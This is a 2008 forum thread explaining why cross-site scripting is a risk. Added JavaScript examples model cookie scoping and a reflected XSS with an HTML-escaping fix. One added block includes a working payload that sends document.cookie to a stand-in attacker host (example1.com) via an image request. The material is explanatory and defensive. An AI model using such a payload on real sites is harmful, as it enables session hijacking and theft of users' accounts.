I've read quite a few documents now and watched a video and I really don't understand how XSS is an issue. What I understand so far is that JavaScript is run in the client's browser to expose their cookies. But it also seems that a site hosting XSS can only reveal cookies for that particular domain, which the domain has access to anyway.
Am I confusing XSS in thinking that it's somehow possible to create a page that, when a user visits it, sends all of their cookies, including other domains' cookies, to another address?
EG:
Visit http://www.example.com/stealCookies.php
stealCookies.php fetches ALL cookies from the user's browser
stealCookies.php sends those cookies to the attacker.
I don't understand the risk of XSS
Re: I don't understand the risk of XSS
No, you can't steal cookies this way because you don't have access to cookies which do not belong to the example.com domain. You need to inject JavaScript code into the target domain, which when executed in the browser sends (usually by GET) the cookie content to a page in another domain (the attacker's domain).
Last edited by VladSun on Thu Jun 05, 2008 3:16 pm, edited 1 time in total.
There are 10 types of people in this world, those who understand binary and those who don't
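As an added example (not part of VladSun's post or anything else in this thread), the scoping rule behind that answer, modelled in Node.js: what document.cookie hands to a script depends on the host the script is running on and on the cookie's Domain and HttpOnly attributes. The cookie jar and host names below are constructed for illustration.

```javascript
// Added example, not from the thread: a model of which cookies a script can
// read through document.cookie, following the domain-matching rule of RFC 6265.
// The jar below is constructed for illustration.

// One entry per cookie the browser holds. `hostOnly` is true when the cookie
// was set without a Domain attribute, so it belongs to that exact host only.
const JAR = [
  { name: 'pref', value: 'dark', domain: 'www.example.com', hostOnly: true,  httpOnly: false },
  { name: 'sid',  value: 'abc',  domain: 'example2.org',    hostOnly: false, httpOnly: false },
  { name: 'auth', value: 'zzz',  domain: 'example2.org',    hostOnly: false, httpOnly: true  },
  { name: 'tid',  value: 't1',   domain: 'example1.com',    hostOnly: false, httpOnly: false },
];

// RFC 6265 section 5.1.3: a host matches a cookie domain when they are equal,
// or when the host ends with the domain and the character just before it is a dot.
function domainMatches(host, domain) {
  host = host.toLowerCase();
  domain = domain.toLowerCase();
  return host === domain || host.endsWith('.' + domain);
}

// What `document.cookie` returns for a script running on `host`: only cookies
// scoped to that host, and never ones flagged HttpOnly.
function documentCookie(jar, host) {
  return jar
    .filter((c) => !c.httpOnly)
    .filter((c) => (c.hostOnly ? host.toLowerCase() === c.domain : domainMatches(host, c.domain)))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// The OP's stealCookies.php served from www.example.com: its script sees
// www.example.com's own cookies and nothing else.
console.log('www.example.com sees:', JSON.stringify(documentCookie(JAR, 'www.example.com')));

// Script injected into example2.org (the XSS case): sees example2.org's cookies,
// except the HttpOnly one, whether it runs on the apex host or a subdomain.
console.log('example2.org sees:', JSON.stringify(documentCookie(JAR, 'example2.org')));
console.log('www.example2.org sees:', JSON.stringify(documentCookie(JAR, 'www.example2.org')));
```

The www.example.com run is the OP's stealCookies.php: it gets its own cookies and nothing from example2.org. The example2.org run is the XSS case: because the injected script executes under that host, it gets that host's cookies. The `auth` cookie never appears because it is HttpOnly; that flag blocks this particular read, not the execution of the injected script.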
impulse()
- Forum Regular
- Posts: 748
- Joined: Wed Aug 09, 2006 8:36 am
- Location: Staffordshire, UK
Re: I don't understand the risk of XSS
So there are 2 example domains:
example1.com
example2.org
example1.com is an attacker's domain and example2.org is the domain an attacker wants to steal a user's cookies for. Would an attacker need to gain access to example2.org and host a file on there before XSS would work?
Re: I don't understand the risk of XSS
Usually the XSS code is injected through unsanitized inputs/outputs on example2.org.
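As an added example (not code from the thread), here is the injection route just described, in Node.js: example2.org reflects a search parameter into its HTML without encoding it, example1.com hosts a link that carries the payload, and the same template with output encoding is the fix. The path /search, the parameter name q and the host names are assumptions.

```javascript
// Added example, not from the thread: a reflected XSS on example2.org caused by
// pasting a query parameter into HTML, the attacker's link on example1.com, and
// the output-encoding fix. Path, parameter name and hosts are assumptions.

// Vulnerable: the search term goes straight into the page.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// HTML-encode the characters that can end a text node or a quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: same template, untrusted value encoded for the HTML text context.
function renderSearchFixed(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Payload the attacker embeds in a link on example1.com. If example2.org reflects
// it, it runs in the victim's browser under example2.org's origin and sends that
// origin's cookies to example1.com by GET (an image request), as VladSun describes.
const PAYLOAD =
  '<script>new Image().src="https://example1.com/c?"+encodeURIComponent(document.cookie)</script>';
const ATTACK_URL = 'https://example2.org/search?q=' + encodeURIComponent(PAYLOAD);

// Stand-in for example2.org's request handler: decode the parameter, render.
function handleRequest(url, render) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return render(q);
}

// Rough stand-in for the browser's parser: does the response contain a real
// <script> element, as opposed to encoded text that merely looks like one?
function containsScriptTag(html) {
  return /<script\b[^>]*>[\s\S]*?<\/script\s*>/i.test(html);
}

// Where the injected script would send the cookies, if it is live at all.
function exfilHost(html) {
  const m = /new Image\(\)\.src="https:\/\/([^/"]+)\//.exec(html);
  return m ? m[1] : null;
}

function demo() {
  const vulnerable = handleRequest(ATTACK_URL, renderSearchVulnerable);
  const fixed = handleRequest(ATTACK_URL, renderSearchFixed);
  return {
    vulnerableRuns: containsScriptTag(vulnerable), // true
    vulnerableSendsTo: exfilHost(vulnerable),      // 'example1.com'
    fixedRuns: containsScriptTag(fixed),           // false
    fixedHtml: fixed,
  };
}

console.log(demo());
```

escapeHtml is right for a value placed in HTML text or a quoted attribute; a value dropped into a script block, a URL or an event-handler attribute needs the encoding for that context instead. containsScriptTag is only a stand-in for what the browser's parser does with the two responses: in the vulnerable one the script element is real, in the fixed one it is inert text.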
impulse()
Re: I don't understand the risk of XSS
That makes a lot more sense. Before you said that, it seemed to me that the attacker had to gain unauthorized access to example2.org and host a rogue file there.
Thanks,
Re: I don't understand the risk of XSS
XSS >> (even >>>>!) cookie stealing
(Hint: ">>" is the math notation for "much much greater")
It is generally an attack on the client. It exploits the trust the client has in the server. Leaking cookies to a 3rd party is only one of the possible concerns. XSS can lead to / be used for defacing, phishing, as leverage to help CSRF, as a covert communication channel, for (D)DoS, etc. Persistent XSS in a multi-user site means lots of browsers under the control of the attacker, an instant botnet if you will.
It is a serious vulnerability, easy to make, easy for an attacker to discover, and potentially damaging to many parties.
impulse()
Re: I don't understand the risk of XSS
So any website that uses cookies and doesn't validate user input is at risk?
Re: I don't understand the risk of XSS
impulse() wrote: So any website that uses cookies and doesn't validate user input is at risk?
Any website that doesn't validate/filter/sanitize user input is at risk.